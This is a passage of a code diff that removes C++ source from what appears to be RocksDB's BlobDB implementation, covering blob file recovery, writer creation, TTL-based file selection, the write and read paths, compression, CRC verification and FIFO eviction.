-              std::min(expiration_range.first, record.expiration);
-          expiration_range.second =
-              std::max(expiration_range.second, record.expiration);
-        }
-        record_start = reader->GetNextByte();
-      }
-
-      if (record_start != bfptr->GetFileSize()) {
-        ROCKS_LOG_ERROR(db_options_.info_log,
-                        "Blob file is corrupted or crashed during write %s"
-                        " good_size: %" PRIu64 " file_size: %" PRIu64,
-                        bfpath.c_str(), record_start, bfptr->GetFileSize());
-      }
-
-      if (!blob_count) {
-        ROCKS_LOG_INFO(db_options_.info_log, "BlobCount = 0 in file %s",
-                       bfpath.c_str());
-        continue;
-      }
-
-      bfptr->SetBlobCount(blob_count);
-      bfptr->SetSequenceRange({0, 0});
-
-      ROCKS_LOG_INFO(db_options_.info_log,
-                     "Blob File: %s blob_count: %" PRIu64
-                     " size_bytes: %" PRIu64 " has_ttl: %d",
-                     bfpath.c_str(), blob_count, size_bytes, bfptr->HasTTL());
-
-      if (bfptr->HasTTL()) {
-        expiration_range.second = std::max(
-            expiration_range.second,
-            expiration_range.first + (uint32_t)bdb_options_.ttl_range_secs);
-        bfptr->set_expiration_range(expiration_range);
-
-        uint64_t now = EpochNow();
-        if (expiration_range.second < now) {
-          Status fstatus = CreateWriterLocked(bfptr);
-          if (fstatus.ok()) fstatus = bfptr->WriteFooterAndCloseLocked();
-          if (!fstatus.ok()) {
-            ROCKS_LOG_ERROR(
-                db_options_.info_log,
-                "Failed to close Blob File: %s status: '%s'. Skipped",
-                bfpath.c_str(), fstatus.ToString().c_str());
-            continue;
-          } else {
-            ROCKS_LOG_ERROR(
-                db_options_.info_log,
-                "Blob File Closed: %s now: %d expiration_range: (%d, %d)",
-                bfpath.c_str(), now, expiration_range.first,
-                expiration_range.second);
-          }
-        } else {
-          open_ttl_files_.insert(bfptr);
-        }
-      }
-    }
-
-    blob_files_.insert(std::make_pair(f_iter.first, bfptr));
-  }
-
-  return status;
-}
-
-void BlobDBImpl::CloseRandomAccessLocked(
-    const std::shared_ptr<BlobFile>& bfile) {
-  bfile->CloseRandomAccessLocked();
-  open_file_count_--;
-}
-
-std::shared_ptr<RandomAccessFileReader> BlobDBImpl::GetOrOpenRandomAccessReader(
-    const std::shared_ptr<BlobFile>& bfile, Env* env,
-    const EnvOptions& env_options) {
-  bool fresh_open = false;
-  auto rar = bfile->GetOrOpenRandomAccessReader(env, env_options, &fresh_open);
-  if (fresh_open) open_file_count_++;
-  return rar;
-}
-
-std::shared_ptr<BlobFile> BlobDBImpl::NewBlobFile(const std::string& reason) {
-  uint64_t file_num = next_file_number_++;
-  auto bfile = std::make_shared<BlobFile>(this, blob_dir_, file_num);
-  ROCKS_LOG_DEBUG(db_options_.info_log, "New blob file created: %s reason='%s'",
-                  bfile->PathName().c_str(), reason.c_str());
-  LogFlush(db_options_.info_log);
-  return bfile;
-}
-
-Status BlobDBImpl::CreateWriterLocked(const std::shared_ptr<BlobFile>& bfile) {
-  std::string fpath(bfile->PathName());
-  std::unique_ptr<WritableFile> wfile;
-
-  Status s = env_->ReopenWritableFile(fpath, &wfile, env_options_);
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "Failed to open blob file for write: %s status: '%s'"
-                    " exists: '%s'",
-                    fpath.c_str(), s.ToString().c_str(),
-                    env_->FileExists(fpath).ToString().c_str());
-    return s;
-  }
-
-  std::unique_ptr<WritableFileWriter> fwriter;
-  fwriter.reset(new WritableFileWriter(std::move(wfile), env_options_));
-
-  uint64_t boffset = bfile->GetFileSize();
-  if (debug_level_ >= 2 && boffset) {
-    ROCKS_LOG_DEBUG(db_options_.info_log, "Open blob file: %s with offset: %d",
-                    fpath.c_str(), boffset);
-  }
-
-  Writer::ElemType et = Writer::kEtNone;
-  if (bfile->file_size_ == BlobLogHeader::kSize) {
-    et = Writer::kEtFileHdr;
-  } else if (bfile->file_size_ > BlobLogHeader::kSize) {
-    et = Writer::kEtRecord;
-  } else if (bfile->file_size_) {
-    ROCKS_LOG_WARN(db_options_.info_log,
-                   "Open blob file: %s with wrong size: %d", fpath.c_str(),
-                   boffset);
-    return Status::Corruption("Invalid blob file size");
-  }
-
-  bfile->log_writer_ = std::make_shared<Writer>(
-      std::move(fwriter), bfile->file_number_, bdb_options_.bytes_per_sync,
-      db_options_.use_fsync, boffset);
-  bfile->log_writer_->last_elem_type_ = et;
-
-  return s;
-}
-
-std::shared_ptr<BlobFile> BlobDBImpl::FindBlobFileLocked(
-    uint64_t expiration) const {
-  if (open_ttl_files_.empty()) return nullptr;
-
-  std::shared_ptr<BlobFile> tmp = std::make_shared<BlobFile>();
-  tmp->expiration_range_ = std::make_pair(expiration, 0);
-
-  auto citr = open_ttl_files_.equal_range(tmp);
-  if (citr.first == open_ttl_files_.end()) {
-    assert(citr.second == open_ttl_files_.end());
-
-    std::shared_ptr<BlobFile> check = *(open_ttl_files_.rbegin());
-    return (check->expiration_range_.second < expiration) ? nullptr : check;
-  }
-
-  if (citr.first != citr.second) return *(citr.first);
-
-  auto finditr = citr.second;
-  if (finditr != open_ttl_files_.begin()) --finditr;
-
-  bool b2 = (*finditr)->expiration_range_.second < expiration;
-  bool b1 = (*finditr)->expiration_range_.first > expiration;
-
-  return (b1 || b2) ? nullptr : (*finditr);
-}
-
-std::shared_ptr<Writer> BlobDBImpl::CheckOrCreateWriterLocked(
-    const std::shared_ptr<BlobFile>& bfile) {
-  std::shared_ptr<Writer> writer = bfile->GetWriter();
-  if (writer) return writer;
-
-  Status s = CreateWriterLocked(bfile);
-  if (!s.ok()) return nullptr;
-
-  writer = bfile->GetWriter();
-  return writer;
-}
-
-std::shared_ptr<BlobFile> BlobDBImpl::SelectBlobFile() {
-  {
-    ReadLock rl(&mutex_);
-    if (open_non_ttl_file_ != nullptr) {
-      return open_non_ttl_file_;
-    }
-  }
-
-  // CHECK again
-  WriteLock wl(&mutex_);
-  if (open_non_ttl_file_ != nullptr) {
-    return open_non_ttl_file_;
-  }
-
-  std::shared_ptr<BlobFile> bfile = NewBlobFile("SelectBlobFile");
-  assert(bfile);
-
-  // file not visible, hence no lock
-  std::shared_ptr<Writer> writer = CheckOrCreateWriterLocked(bfile);
-  if (!writer) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "Failed to get writer from blob file: %s",
-                    bfile->PathName().c_str());
-    return nullptr;
-  }
-
-  bfile->file_size_ = BlobLogHeader::kSize;
-  bfile->header_.compression = bdb_options_.compression;
-  bfile->header_.has_ttl = false;
-  bfile->header_.column_family_id =
-      reinterpret_cast<ColumnFamilyHandleImpl*>(DefaultColumnFamily())->GetID();
-  bfile->header_valid_ = true;
-  bfile->SetHasTTL(false);
-  bfile->SetCompression(bdb_options_.compression);
-
-  Status s = writer->WriteHeader(bfile->header_);
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "Failed to write header to new blob file: %s"
-                    " status: '%s'",
-                    bfile->PathName().c_str(), s.ToString().c_str());
-    return nullptr;
-  }
-
-  dir_change_.store(true);
-  blob_files_.insert(std::make_pair(bfile->BlobFileNumber(), bfile));
-  open_non_ttl_file_ = bfile;
-  return bfile;
-}
-
-std::shared_ptr<BlobFile> BlobDBImpl::SelectBlobFileTTL(uint64_t expiration) {
-  assert(expiration != kNoExpiration);
-  uint64_t epoch_read = 0;
-  std::shared_ptr<BlobFile> bfile;
-  {
-    ReadLock rl(&mutex_);
-    bfile = FindBlobFileLocked(expiration);
-    epoch_read = epoch_of_.load();
-  }
-
-  if (bfile) {
-    assert(!bfile->Immutable());
-    return bfile;
-  }
-
-  uint64_t exp_low =
-      (expiration / bdb_options_.ttl_range_secs) * bdb_options_.ttl_range_secs;
-  uint64_t exp_high = exp_low + bdb_options_.ttl_range_secs;
-  ExpirationRange expiration_range = std::make_pair(exp_low, exp_high);
-
-  bfile = NewBlobFile("SelectBlobFileTTL");
-  assert(bfile);
-
-  ROCKS_LOG_INFO(db_options_.info_log, "New blob file TTL range: %s %d %d",
-                 bfile->PathName().c_str(), exp_low, exp_high);
-  LogFlush(db_options_.info_log);
-
-  // we don't need to take lock as no other thread is seeing bfile yet
-  std::shared_ptr<Writer> writer = CheckOrCreateWriterLocked(bfile);
-  if (!writer) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "Failed to get writer from blob file with TTL: %s",
-                    bfile->PathName().c_str());
-    return nullptr;
-  }
-
-  bfile->header_.expiration_range = expiration_range;
-  bfile->header_.compression = bdb_options_.compression;
-  bfile->header_.has_ttl = true;
-  bfile->header_.column_family_id =
-      reinterpret_cast<ColumnFamilyHandleImpl*>(DefaultColumnFamily())->GetID();
-  ;
-  bfile->header_valid_ = true;
-  bfile->SetHasTTL(true);
-  bfile->SetCompression(bdb_options_.compression);
-  bfile->file_size_ = BlobLogHeader::kSize;
-
-  // set the first value of the range, since that is
-  // concrete at this time.  also necessary to add to open_ttl_files_
-  bfile->expiration_range_ = expiration_range;
-
-  WriteLock wl(&mutex_);
-  // in case the epoch has shifted in the interim, then check
-  // check condition again - should be rare.
-  if (epoch_of_.load() != epoch_read) {
-    auto bfile2 = FindBlobFileLocked(expiration);
-    if (bfile2) return bfile2;
-  }
-
-  Status s = writer->WriteHeader(bfile->header_);
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "Failed to write header to new blob file: %s"
-                    " status: '%s'",
-                    bfile->PathName().c_str(), s.ToString().c_str());
-    return nullptr;
-  }
-
-  dir_change_.store(true);
-  blob_files_.insert(std::make_pair(bfile->BlobFileNumber(), bfile));
-  open_ttl_files_.insert(bfile);
-  epoch_of_++;
-
-  return bfile;
-}
-
-Status BlobDBImpl::Delete(const WriteOptions& options, const Slice& key) {
-  SequenceNumber lsn = db_impl_->GetLatestSequenceNumber();
-  Status s = db_->Delete(options, key);
-
-  if (bdb_options_.enable_garbage_collection) {
-    // add deleted key to list of keys that have been deleted for book-keeping
-    delete_keys_q_.enqueue({DefaultColumnFamily(), key.ToString(), lsn});
-  }
-  return s;
-}
-
-class BlobDBImpl::BlobInserter : public WriteBatch::Handler {
- private:
-  const WriteOptions& options_;
-  BlobDBImpl* blob_db_impl_;
-  uint32_t default_cf_id_;
-  SequenceNumber sequence_;
-  WriteBatch batch_;
-
- public:
-  BlobInserter(const WriteOptions& options, BlobDBImpl* blob_db_impl,
-               uint32_t default_cf_id, SequenceNumber seq)
-      : options_(options),
-        blob_db_impl_(blob_db_impl),
-        default_cf_id_(default_cf_id),
-        sequence_(seq) {}
-
-  SequenceNumber sequence() { return sequence_; }
-
-  WriteBatch* batch() { return &batch_; }
-
-  virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                       const Slice& value) override {
-    if (column_family_id != default_cf_id_) {
-      return Status::NotSupported(
-          "Blob DB doesn't support non-default column family.");
-    }
-    std::string new_value;
-    Slice value_slice;
-    uint64_t expiration =
-        blob_db_impl_->ExtractExpiration(key, value, &value_slice, &new_value);
-    Status s = blob_db_impl_->PutBlobValue(options_, key, value_slice,
-                                           expiration, sequence_, &batch_);
-    sequence_++;
-    return s;
-  }
-
-  virtual Status DeleteCF(uint32_t column_family_id,
-                          const Slice& key) override {
-    if (column_family_id != default_cf_id_) {
-      return Status::NotSupported(
-          "Blob DB doesn't support non-default column family.");
-    }
-    Status s = WriteBatchInternal::Delete(&batch_, column_family_id, key);
-    sequence_++;
-    return s;
-  }
-
-  virtual Status DeleteRange(uint32_t column_family_id, const Slice& begin_key,
-                             const Slice& end_key) {
-    if (column_family_id != default_cf_id_) {
-      return Status::NotSupported(
-          "Blob DB doesn't support non-default column family.");
-    }
-    Status s = WriteBatchInternal::DeleteRange(&batch_, column_family_id,
-                                               begin_key, end_key);
-    sequence_++;
-    return s;
-  }
-
-  virtual Status SingleDeleteCF(uint32_t /*column_family_id*/,
-                                const Slice& /*key*/) override {
-    return Status::NotSupported("Not supported operation in blob db.");
-  }
-
-  virtual Status MergeCF(uint32_t /*column_family_id*/, const Slice& /*key*/,
-                         const Slice& /*value*/) override {
-    return Status::NotSupported("Not supported operation in blob db.");
-  }
-
-  virtual void LogData(const Slice& blob) override { batch_.PutLogData(blob); }
-};
-
-Status BlobDBImpl::Write(const WriteOptions& options, WriteBatch* updates) {
-
-  uint32_t default_cf_id =
-      reinterpret_cast<ColumnFamilyHandleImpl*>(DefaultColumnFamily())->GetID();
-  // TODO(yiwu): In case there are multiple writers the latest sequence would
-  // not be the actually sequence we are writting. Need to get the sequence
-  // from write batch after DB write instead.
-  SequenceNumber current_seq = GetLatestSequenceNumber() + 1;
-  Status s;
-  BlobInserter blob_inserter(options, this, default_cf_id, current_seq);
-  {
-    // Release write_mutex_ before DB write to avoid race condition with
-    // flush begin listener, which also require write_mutex_ to sync
-    // blob files.
-    MutexLock l(&write_mutex_);
-    s = updates->Iterate(&blob_inserter);
-  }
-  if (!s.ok()) {
-    return s;
-  }
-  s = db_->Write(options, blob_inserter.batch());
-  if (!s.ok()) {
-    return s;
-  }
-
-  // add deleted key to list of keys that have been deleted for book-keeping
-  class DeleteBookkeeper : public WriteBatch::Handler {
-   public:
-    explicit DeleteBookkeeper(BlobDBImpl* impl, const SequenceNumber& seq)
-        : impl_(impl), sequence_(seq) {}
-
-    virtual Status PutCF(uint32_t /*column_family_id*/, const Slice& /*key*/,
-                         const Slice& /*value*/) override {
-      sequence_++;
-      return Status::OK();
-    }
-
-    virtual Status DeleteCF(uint32_t column_family_id,
-                            const Slice& key) override {
-      ColumnFamilyHandle* cfh =
-          impl_->db_impl_->GetColumnFamilyHandleUnlocked(column_family_id);
-
-      impl_->delete_keys_q_.enqueue({cfh, key.ToString(), sequence_});
-      sequence_++;
-      return Status::OK();
-    }
-
-   private:
-    BlobDBImpl* impl_;
-    SequenceNumber sequence_;
-  };
-
-  if (bdb_options_.enable_garbage_collection) {
-    // add deleted key to list of keys that have been deleted for book-keeping
-    DeleteBookkeeper delete_bookkeeper(this, current_seq);
-    s = updates->Iterate(&delete_bookkeeper);
-  }
-
-  return s;
-}
-
-Status BlobDBImpl::GetLiveFiles(std::vector<std::string>& ret,
-                                uint64_t* manifest_file_size,
-                                bool flush_memtable) {
-  // Hold a lock in the beginning to avoid updates to base DB during the call
-  ReadLock rl(&mutex_);
-  Status s = db_->GetLiveFiles(ret, manifest_file_size, flush_memtable);
-  if (!s.ok()) {
-    return s;
-  }
-  ret.reserve(ret.size() + blob_files_.size());
-  for (auto bfile_pair : blob_files_) {
-    auto blob_file = bfile_pair.second;
-    ret.emplace_back(blob_file->PathName());
-  }
-  return Status::OK();
-}
-
-void BlobDBImpl::GetLiveFilesMetaData(std::vector<LiveFileMetaData>* metadata) {
-  // Hold a lock in the beginning to avoid updates to base DB during the call
-  ReadLock rl(&mutex_);
-  db_->GetLiveFilesMetaData(metadata);
-  for (auto bfile_pair : blob_files_) {
-    auto blob_file = bfile_pair.second;
-    LiveFileMetaData filemetadata;
-    filemetadata.size = blob_file->GetFileSize();
-    filemetadata.name = blob_file->PathName();
-    auto cfh =
-        reinterpret_cast<ColumnFamilyHandleImpl*>(DefaultColumnFamily());
-    filemetadata.column_family_name = cfh->GetName();
-    metadata->emplace_back(filemetadata);
-  }
-}
-
-Status BlobDBImpl::Put(const WriteOptions& options, const Slice& key,
-                       const Slice& value) {
-  std::string new_value;
-  Slice value_slice;
-  uint64_t expiration = ExtractExpiration(key, value, &value_slice, &new_value);
-  return PutUntil(options, key, value_slice, expiration);
-}
-
-Status BlobDBImpl::PutWithTTL(const WriteOptions& options,
-                              const Slice& key, const Slice& value,
-                              uint64_t ttl) {
-  uint64_t now = EpochNow();
-  uint64_t expiration = kNoExpiration - now > ttl ? now + ttl : kNoExpiration;
-  return PutUntil(options, key, value, expiration);
-}
-
-Status BlobDBImpl::PutUntil(const WriteOptions& options, const Slice& key,
-                            const Slice& value, uint64_t expiration) {
-  TEST_SYNC_POINT("BlobDBImpl::PutUntil:Start");
-  Status s;
-  WriteBatch batch;
-  {
-    // Release write_mutex_ before DB write to avoid race condition with
-    // flush begin listener, which also require write_mutex_ to sync
-    // blob files.
-    MutexLock l(&write_mutex_);
-    // TODO(yiwu): In case there are multiple writers the latest sequence would
-    // not be the actually sequence we are writting. Need to get the sequence
-    // from write batch after DB write instead.
-    SequenceNumber sequence = GetLatestSequenceNumber() + 1;
-    s = PutBlobValue(options, key, value, expiration, sequence, &batch);
-  }
-  if (s.ok()) {
-    s = db_->Write(options, &batch);
-  }
-  TEST_SYNC_POINT("BlobDBImpl::PutUntil:Finish");
-  return s;
-}
-
-Status BlobDBImpl::PutBlobValue(const WriteOptions& options, const Slice& key,
-                                const Slice& value, uint64_t expiration,
-                                SequenceNumber sequence, WriteBatch* batch) {
-  Status s;
-  std::string index_entry;
-  uint32_t column_family_id =
-      reinterpret_cast<ColumnFamilyHandleImpl*>(DefaultColumnFamily())->GetID();
-  if (value.size() < bdb_options_.min_blob_size) {
-    if (expiration == kNoExpiration) {
-      // Put as normal value
-      s = batch->Put(key, value);
-    } else {
-      // Inlined with TTL
-      BlobIndex::EncodeInlinedTTL(&index_entry, expiration, value);
-      s = WriteBatchInternal::PutBlobIndex(batch, column_family_id, key,
-                                           index_entry);
-    }
-  } else {
-    std::shared_ptr<BlobFile> bfile = (expiration != kNoExpiration)
-                                          ? SelectBlobFileTTL(expiration)
-                                          : SelectBlobFile();
-    if (!bfile) {
-      return Status::NotFound("Blob file not found");
-    }
-
-    assert(bfile->compression() == bdb_options_.compression);
-    std::string compression_output;
-    Slice value_compressed = GetCompressedSlice(value, &compression_output);
-
-    std::string headerbuf;
-    Writer::ConstructBlobHeader(&headerbuf, key, value_compressed, expiration);
-
-    s = AppendBlob(bfile, headerbuf, key, value_compressed, expiration,
-                   &index_entry);
-
-    if (s.ok()) {
-      bfile->ExtendSequenceRange(sequence);
-      if (expiration != kNoExpiration) {
-        bfile->ExtendExpirationRange(expiration);
-      }
-      s = CloseBlobFileIfNeeded(bfile);
-      if (s.ok()) {
-        s = WriteBatchInternal::PutBlobIndex(batch, column_family_id, key,
-                                             index_entry);
-      }
-    } else {
-      ROCKS_LOG_ERROR(db_options_.info_log,
-                      "Failed to append blob to FILE: %s: KEY: %s VALSZ: %d"
-                      " status: '%s' blob_file: '%s'",
-                      bfile->PathName().c_str(), key.ToString().c_str(),
-                      value.size(), s.ToString().c_str(),
-                      bfile->DumpState().c_str());
-    }
-  }
-
-  return s;
-}
-
-Slice BlobDBImpl::GetCompressedSlice(const Slice& raw,
-                                     std::string* compression_output) const {
-  if (bdb_options_.compression == kNoCompression) {
-    return raw;
-  }
-  CompressionType ct = bdb_options_.compression;
-  CompressionOptions compression_opts;
-  CompressBlock(raw, compression_opts, &ct, kBlockBasedTableVersionFormat,
-                Slice(), compression_output);
-  return *compression_output;
-}
-
-uint64_t BlobDBImpl::ExtractExpiration(const Slice& key, const Slice& value,
-                                       Slice* value_slice,
-                                       std::string* new_value) {
-  uint64_t expiration = kNoExpiration;
-  bool has_expiration = false;
-  bool value_changed = false;
-  if (ttl_extractor_ != nullptr) {
-    has_expiration = ttl_extractor_->ExtractExpiration(
-        key, value, EpochNow(), &expiration, new_value, &value_changed);
-  }
-  *value_slice = value_changed ? Slice(*new_value) : value;
-  return has_expiration ? expiration : kNoExpiration;
-}
-
-std::shared_ptr<BlobFile> BlobDBImpl::GetOldestBlobFile() {
-  std::vector<std::shared_ptr<BlobFile>> blob_files;
-  CopyBlobFiles(&blob_files, [](const std::shared_ptr<BlobFile>& f) {
-    return !f->Obsolete() && f->Immutable();
-  });
-  blobf_compare_ttl compare;
-  return *std::min_element(blob_files.begin(), blob_files.end(), compare);
-}
-
-bool BlobDBImpl::EvictOldestBlobFile() {
-  auto oldest_file = GetOldestBlobFile();
-  if (oldest_file == nullptr) {
-    return false;
-  }
-
-  WriteLock wl(&mutex_);
-  // Double check the file is not obsolete by others
-  if (oldest_file_evicted_ == false && !oldest_file->Obsolete()) {
-    auto expiration_range = oldest_file->GetExpirationRange();
-    ROCKS_LOG_INFO(db_options_.info_log,
-                   "Evict oldest blob file since DB out of space. Current "
-                   "space used: %" PRIu64 ", blob dir size: %" PRIu64
-                   ", evicted blob file #%" PRIu64
-                   " with expiration range (%" PRIu64 ", %" PRIu64 ").",
-                   total_blob_space_.load(), bdb_options_.blob_dir_size,
-                   oldest_file->BlobFileNumber(), expiration_range.first,
-                   expiration_range.second);
-    oldest_file->MarkObsolete(oldest_file->GetSequenceRange().second);
-    obsolete_files_.push_back(oldest_file);
-    oldest_file_evicted_.store(true);
-    return true;
-  }
-
-  return false;
-}
-
-Status BlobDBImpl::CheckSize(size_t blob_size) {
-  uint64_t new_space_util = total_blob_space_.load() + blob_size;
-  if (bdb_options_.blob_dir_size > 0) {
-    if (!bdb_options_.is_fifo &&
-        (new_space_util > bdb_options_.blob_dir_size)) {
-      return Status::NoSpace(
-          "Write failed, as writing it would exceed blob_dir_size limit.");
-    }
-    if (bdb_options_.is_fifo && !oldest_file_evicted_.load() &&
-        (new_space_util >
-         kEvictOldestFileAtSize * bdb_options_.blob_dir_size)) {
-      EvictOldestBlobFile();
-    }
-  }
-
-  return Status::OK();
-}
-
-Status BlobDBImpl::AppendBlob(const std::shared_ptr<BlobFile>& bfile,
-                              const std::string& headerbuf, const Slice& key,
-                              const Slice& value, uint64_t expiration,
-                              std::string* index_entry) {
-  auto size_put = BlobLogRecord::kHeaderSize + key.size() + value.size();
-  Status s = CheckSize(size_put);
-  if (!s.ok()) {
-    return s;
-  }
-
-  uint64_t blob_offset = 0;
-  uint64_t key_offset = 0;
-  {
-    WriteLock lockbfile_w(&bfile->mutex_);
-    std::shared_ptr<Writer> writer = CheckOrCreateWriterLocked(bfile);
-    if (!writer) return Status::IOError("Failed to create blob writer");
-
-    // write the blob to the blob log.
-    s = writer->EmitPhysicalRecord(headerbuf, key, value, &key_offset,
-                                   &blob_offset);
-  }
-
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "Invalid status in AppendBlob: %s status: '%s'",
-                    bfile->PathName().c_str(), s.ToString().c_str());
-    return s;
-  }
-
-  // increment blob count
-  bfile->blob_count_++;
-
-  bfile->file_size_ += size_put;
-  last_period_write_ += size_put;
-  total_blob_space_ += size_put;
-
-  if (expiration == kNoExpiration) {
-    BlobIndex::EncodeBlob(index_entry, bfile->BlobFileNumber(), blob_offset,
-                          value.size(), bdb_options_.compression);
-  } else {
-    BlobIndex::EncodeBlobTTL(index_entry, expiration, bfile->BlobFileNumber(),
-                             blob_offset, value.size(),
-                             bdb_options_.compression);
-  }
-
-  return s;
-}
-
-std::vector<Status> BlobDBImpl::MultiGet(
-    const ReadOptions& read_options,
-    const std::vector<Slice>& keys, std::vector<std::string>* values) {
-  // Get a snapshot to avoid blob file get deleted between we
-  // fetch and index entry and reading from the file.
-  ReadOptions ro(read_options);
-  bool snapshot_created = SetSnapshotIfNeeded(&ro);
-
-  std::vector<Status> statuses;
-  statuses.reserve(keys.size());
-  values->clear();
-  values->reserve(keys.size());
-  PinnableSlice value;
-  for (size_t i = 0; i < keys.size(); i++) {
-    statuses.push_back(Get(ro, DefaultColumnFamily(), keys[i], &value));
-    values->push_back(value.ToString());
-    value.Reset();
-  }
-  if (snapshot_created) {
-    db_->ReleaseSnapshot(ro.snapshot);
-  }
-  return statuses;
-}
-
-bool BlobDBImpl::SetSnapshotIfNeeded(ReadOptions* read_options) {
-  assert(read_options != nullptr);
-  if (read_options->snapshot != nullptr) {
-    return false;
-  }
-  read_options->snapshot = db_->GetSnapshot();
-  return true;
-}
-
-Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry,
-                                PinnableSlice* value) {
-  assert(value != nullptr);
-  BlobIndex blob_index;
-  Status s = blob_index.DecodeFrom(index_entry);
-  if (!s.ok()) {
-    return s;
-  }
-  if (blob_index.HasTTL() && blob_index.expiration() <= EpochNow()) {
-    return Status::NotFound("Key expired");
-  }
-  if (blob_index.IsInlined()) {
-    // TODO(yiwu): If index_entry is a PinnableSlice, we can also pin the same
-    // memory buffer to avoid extra copy.
-    value->PinSelf(blob_index.value());
-    return Status::OK();
-  }
-  if (blob_index.size() == 0) {
-    value->PinSelf("");
-    return Status::OK();
-  }
-
-  // offset has to have certain min, as we will read CRC
-  // later from the Blob Header, which needs to be also a
-  // valid offset.
-  if (blob_index.offset() <
-      (BlobLogHeader::kSize + BlobLogRecord::kHeaderSize + key.size())) {
-    if (debug_level_ >= 2) {
-      ROCKS_LOG_ERROR(db_options_.info_log,
-                      "Invalid blob index file_number: %" PRIu64
-                      " blob_offset: %" PRIu64 " blob_size: %" PRIu64
-                      " key: %s",
-                      blob_index.file_number(), blob_index.offset(),
-                      blob_index.size(), key.data());
-    }
-    return Status::NotFound("Invalid blob offset");
-  }
-
-  std::shared_ptr<BlobFile> bfile;
-  {
-    ReadLock rl(&mutex_);
-    auto hitr = blob_files_.find(blob_index.file_number());
-
-    // file was deleted
-    if (hitr == blob_files_.end()) {
-      return Status::NotFound("Blob Not Found as blob file missing");
-    }
-
-    bfile = hitr->second;
-  }
-
-  if (blob_index.size() == 0 && value != nullptr) {
-    value->PinSelf("");
-    return Status::OK();
-  }
-
-  // takes locks when called
-  std::shared_ptr<RandomAccessFileReader> reader =
-      GetOrOpenRandomAccessReader(bfile, env_, env_options_);
-
-  std::string* valueptr = value->GetSelf();
-  std::string value_c;
-  if (bdb_options_.compression != kNoCompression) {
-    valueptr = &value_c;
-  }
-
-  // Allocate the buffer. This is safe in C++11
-  // Note that std::string::reserved() does not work, since previous value
-  // of the buffer can be larger than blob_index.size().
-  valueptr->resize(blob_index.size());
-  char* buffer = &(*valueptr)[0];
-
-  Slice blob_value;
-  s = reader->Read(blob_index.offset(), blob_index.size(), &blob_value, buffer);
-  if (!s.ok() || blob_value.size() != blob_index.size()) {
-    if (debug_level_ >= 2) {
-      ROCKS_LOG_ERROR(db_options_.info_log,
-                      "Failed to read blob from file: %s blob_offset: %" PRIu64
-                      " blob_size: %" PRIu64 " read: %d key: %s status: '%s'",
-                      bfile->PathName().c_str(), blob_index.offset(),
-                      blob_index.size(), static_cast<int>(blob_value.size()),
-                      key.data(), s.ToString().c_str());
-    }
-    return Status::NotFound("Blob Not Found as couldnt retrieve Blob");
-  }
-
-  // TODO(yiwu): Add an option to skip crc checking.
-  Slice crc_slice;
-  uint32_t crc_exp;
-  std::string crc_str;
-  crc_str.resize(sizeof(uint32_t));
-  char* crc_buffer = &(crc_str[0]);
-  s = reader->Read(blob_index.offset() - (key.size() + sizeof(uint32_t)),
-                   sizeof(uint32_t), &crc_slice, crc_buffer);
-  if (!s.ok() || !GetFixed32(&crc_slice, &crc_exp)) {
-    if (debug_level_ >= 2) {
-      ROCKS_LOG_ERROR(db_options_.info_log,
-                      "Failed to fetch blob crc file: %s blob_offset: %" PRIu64
-                      " blob_size: %" PRIu64 " key: %s status: '%s'",
-                      bfile->PathName().c_str(), blob_index.offset(),
-                      blob_index.size(), key.data(), s.ToString().c_str());
-    }
-    return Status::NotFound("Blob Not Found as couldnt retrieve CRC");
-  }
-
-  uint32_t crc = crc32c::Value(key.data(), key.size());
-  crc = crc32c::Extend(crc, blob_value.data(), blob_value.size());
-  crc = crc32c::Mask(crc);  // Adjust for storage
-  if (crc != crc_exp) {
-    if (debug_level_ >= 2) {
-      ROCKS_LOG_ERROR(db_options_.info_log,
-                      "Blob crc mismatch file: %s blob_offset: %" PRIu64
-                      " blob_size: %" PRIu64 " key: %s status: '%s'",
-                      bfile->PathName().c_str(), blob_index.offset(),
-                      blob_index.size(), key.data(), s.ToString().c_str());
-    }
-    return Status::Corruption("Corruption. Blob CRC mismatch");
-  }
-
-  if (bfile->compression() != kNoCompression) {
-    BlockContents contents;
-    auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(DefaultColumnFamily());
-    s = UncompressBlockContentsForCompressionType(
-        blob_value.data(), blob_value.size(), &contents,
-        kBlockBasedTableVersionFormat, Slice(), bfile->compression(),
-        *(cfh->cfd()->ioptions()));
-    *(value->GetSelf()) = contents.data.ToString();
-  }
-
-  value->PinSelf();
-
-  return s;
-}
-
-Status BlobDBImpl::Get(const ReadOptions& read_options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       PinnableSlice* value) {
-  if (column_family != DefaultColumnFamily()) {
-    return Status::NotSupported(
-        "Blob DB doesn't support non-default column family.");
-  }
-  // Get a snapshot to avoid blob file get deleted between we
-  // fetch and index entry and reading from the file.
-  // TODO(yiwu): For Get() retry if file not found would be a simpler strategy.
-  ReadOptions ro(read_options);
-  bool snapshot_created = SetSnapshotIfNeeded(&ro);
-
-  Status s;
-  bool is_blob_index = false;
-  s = db_impl_->GetImpl(ro, column_family, key, value,
-                        nullptr /*value_found*/, &is_blob_index);
-  TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:1");
-  TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:2");
-  if (s.ok() && is_blob_index) {
-    std::string index_entry = value->ToString();
-    value->Reset();
-    s = GetBlobValue(key, index_entry, value);
-  }
-  if (snapshot_created) {
-    db_->ReleaseSnapshot(ro.snapshot);
-  }
-  return s;
-}
-
-std::pair<bool, int64_t> BlobDBImpl::SanityCheck(bool aborted) {
-  if (aborted) return std::make_pair(false, -1);
-
-  ROCKS_LOG_INFO(db_options_.info_log, "Starting Sanity Check");
-
-  ROCKS_LOG_INFO(db_options_.info_log, "Number of files %" PRIu64,
-                 blob_files_.size());
-
-  ROCKS_LOG_INFO(db_options_.info_log, "Number of open files %" PRIu64,
-                 open_ttl_files_.size());
-
-  for (auto bfile : open_ttl_files_) {
-    assert(!bfile->Immutable());
-  }
-
-  uint64_t epoch_now = EpochNow();
-
-  for (auto bfile_pair : blob_files_) {
